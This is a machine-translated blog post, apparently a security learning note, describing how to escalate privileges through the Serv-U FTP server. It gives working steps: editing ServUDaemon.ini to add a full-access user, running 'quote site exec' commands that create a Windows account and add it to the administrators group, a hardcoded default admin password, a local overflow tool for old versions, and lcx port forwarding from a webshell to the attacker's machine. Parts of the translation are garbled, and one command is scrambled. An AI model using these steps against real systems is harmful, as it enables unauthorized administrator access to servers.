Third-party software serv-u mention the right to provide the right learning Day7--

Others 2019-12-25 16:04:25 views: null

0x00 serv-u Profile

  • Serv-U FTP Server, is a widely used FTP server software, supports 3x / 9x / ME / NT / 2K Windows so the whole series. FTP server can set up multiple defined user authority, home directory and log space size
  • serv-u default installation directory: C: \ Program Files \ rhinosoft.com \ serv-U
  • serv-u password file: ServUDaemon.ini
  • Port Number: The default port is 43958
    ServUDaemon.ini port in lccalsetuportNo =

0x01 FTP mention the right method

1, modified permissions

2, no permission to modify

3, serv-u ftp overflow local privilege escalation (using 6.0 and previous versions)

4, serv-u ftp port forwarding

0x02 have modify rights

The following steps:
1. If the installation serv-u
nmap port scan confirmation
2, check writable
general installation directory C: \ Program Files \ Serv-U \ SerUDaemon.ini
. 3, serv-u add users
in user4 = Add a system user

[USER=quan|1]                                //用户名
Password=                       //用户密码加密后的密文
HomeDir=c:\ftp\quan             //目录
RelPaths=3 
TimeOut=600                      //超时时间设置
Maintenance=System               //权限
Access1=C:\|RWAMELCDP            //可访问的目录及权限
Access2=d:\|RWAMELCDP            //可访问的目录及权限
Access3=e:\|RWAMELCDP            //可访问的目录及权限
SKEYValues=

bit random character password = 2 + md5 (2-bit random character +123456)

4, connected to the target FTP server

ftp 目标IP地址 刚添加的用户密码

5, using the ftp command quote site execto add a user permission to join administrators group

quote site exec net user quan quan123 /add
quote site exec net localgroup administrators quan /add

No permission to modify 0x03

1, decryption using directly to md5
2, the default user name and password
account: LocalAdministrator, Password: #l@$ak#.lk; 0 @ P
command:
cmd / C User Quan quan123 NET / NET localgroup Administrators & Quan the Add / the Add
. 3 when not the default password
directly to the download SerUAdmin.exe
opened with winhex Find LocalAdministrator (select ANSI character) to find password

0x04 serv-u ftp overflow local privilege escalation (using 6.0 and previous versions)

The following steps:
1, provide the right tools generate an integrated tool serv_u.exe mention the right Serv-U
2, the first upload to the next letter serv_u.exe
such disc d is
3, Run

d:\serv_u.exe
d:\serv_u.exe “net user quan quan123 /add”
d:\serv_u.exe “net localgroup administrators quan /add”

Note that the command to have quotes

0x05 serv-u ftp port forwarding

1, lcx port forwarding
to run commands on the target LCX Webshell

lcx -slave yourIP 5000 127.0.0.1 43958

Running in the machine

lcx -listen 5000 21

2, the machine landed Serv_U
open local SERV_U fill in the IP 127.0.0.1
account write LocalAdministrator password #l@$ak#.lk; 0 @ P

0x06 Reference

https://blog.csdn.net/God_XiangYu/article/details/99692269
https://www.cnblogs.com/feizianquan/p/10891352.html

Guess you like

Origin www.cnblogs.com/0nc3/p/12097070.html
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com